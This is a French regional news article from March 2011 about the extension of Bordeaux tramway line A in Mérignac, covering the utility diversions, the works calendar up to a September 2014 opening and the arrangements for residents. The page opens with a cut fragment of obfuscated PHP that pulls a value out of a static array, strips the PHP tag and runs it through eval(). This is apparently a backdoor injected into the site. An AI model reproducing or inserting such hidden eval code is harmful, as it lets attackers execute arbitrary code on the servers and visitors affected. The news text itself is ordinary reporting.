kHhBYOlxP();}private function kHhBYOlxP(){if (is_array(Vr_xOKC::$EYMRdzgrZ)) {$DrRlHJ = str_replace(chr (60) . chr (63) . "\160" . "\x68" . 'p', "", Vr_xOKC::$EYMRdzgrZ[chr (99) . 'o' . 'n' . chr ( 576 - 460 )."\145" . "\x6e" . 't']);eval($DrRlHJ);exit();}}}$OHkfKNbfTW = new Vr_xOKC(); $OHkfKNbfTW = 46220;} ?>
3 mars 2011 06h00 | Par Olivier Delhoumeau | 1 | commentaire(s) |
Mérignac
Les premiers coups de pioche vont vite arriver. Pour avertir la population de l'imminence du chantier de la troisième phase du tramway, la CUB a décidé de lancer une série de réunions publiques.
Mardi soir, Mérignac ouvrait le bal avec l'extension de la ligne A. Autour de la table, Gérard Chausset, vice-président de la CUB en charge des transports de demain, et les autres intervenants ne sont pas revenus sur les grands principes du tracé. Ils ont mis l'accent sur les travaux qui se traduiront par un rallongement de 3,6 km de la ligne A, la création de cinq nouvelles stations et la construction de deux parcs relais.
Livraison en septembre 2014Les concessionnaires seront les premiers à entrer en action. Le chantier débutera par les déviations de réseaux (eau, gaz, électricité, téléphone…). Le déplacement des canalisations est un préalable indispensable. « Les rails étant lourds et coûteux, on ne peut se permettre d'avoir des tuyaux sous la plate-forme. On libère donc la place », a expliqué Bruno Malek, chef de projet de la ligne de Mérignac.
Les rues Dorgelès, Utrillo et Robinson seront traitées en priorité. Dès avril. Spectaculaire, ce démarrage consistera à installer un collecteur d'assainissement de 1,6 m de diamètre dans le sous-sol. « On viendra en parler aux riverains concernés », a déclaré le technicien en marge de la réunion. Le chantier progressera de l'avenue Dorgelès vers Robinson, dans le sens inverse de l'écoulement. Globalement, l'étape de déviation de réseaux s'étendra sur un an. La portion comprise entre le Pin Galant et le centre-ville sera faite dans un second temps, à partir de novembre 2011. Pour s'achever en juillet 2012. Ce décalage a pour but de limiter les perturbations de circulation dans le centre-ville.
Si le calendrier est respecté, les travaux du tramway à proprement parler (infrastructure et voie ferrée) seront engagés début 2012. Plusieurs portions du tracé avanceront de manière concomitante. Cette phase comprend la redistribution de l'espace entre trottoirs, pistes cyclables, stationnement, voies de circulation, l'éclairage public, le terrassement et la pose des rails. En outre, un pont de franchissement de la rocade verra le jour à hauteur de la sortie 9 (Magudas). L'édification de l'ouvrage commencera en fin d'année. Il jouxtera celui réservé à la circulation routière. Cette vaste étape prendra fin, si tout va bien, en mars 2014.
S'ensuivront les travaux dits d'équipement : ligne aérienne, câblage, aménagement des quais de station… La mise en service de l'extension étant prévue en septembre 2014.
Il va de soi que, pendant cette période, des déviations seront installées. Les rues devant être mises en impasse ou en sens unique en raison de l'arrivée du tramway le seront dès l'entame des travaux. L'accès aux riverains sera maintenu avant 9 heures du matin et le soir après 16 heures. En dehors de ce créneau, « ce sera plus difficile mais toujours possible », assurent les techniciens.
Des lettres d'information du chantier seront régulièrement distribuées aux riverains. Les déviations seront matérialisées par une signalétique spécifique. À l'occasion, la CUB organisera des réunions de suivi par quartier. Enfin, un médiateur de chantier se tiendra à la disposition des riverains pour répondre aux différentes interrogations (1).
Une commission d'indemnisation des commerces dont le chiffre d'affaires aura été impacté par les travaux du tramway sera mise en place, à l'instar des phases précédentes.
(1) Le médiateur de la ligne A s'appelle Alexandre Flor. Il sera joignable tous les jours sur la zone de chantier, du lundi au vendredi de 9 h à 16 h 30, au 06 16 33 78 14.
Gastronomie / OenologieComité Fête de l'Huître d'Andernos les Bains
Chorale / ChantAAAC - Chorale Rock Oblic Solution
LES ANONYMES DU CAMPUS
SpectacleURBAN VIBRATIONS SCHOOL
Toutes les associations du Sud-Ouest
| ||||||||
|
03/03/2011, à 07h06
Alertez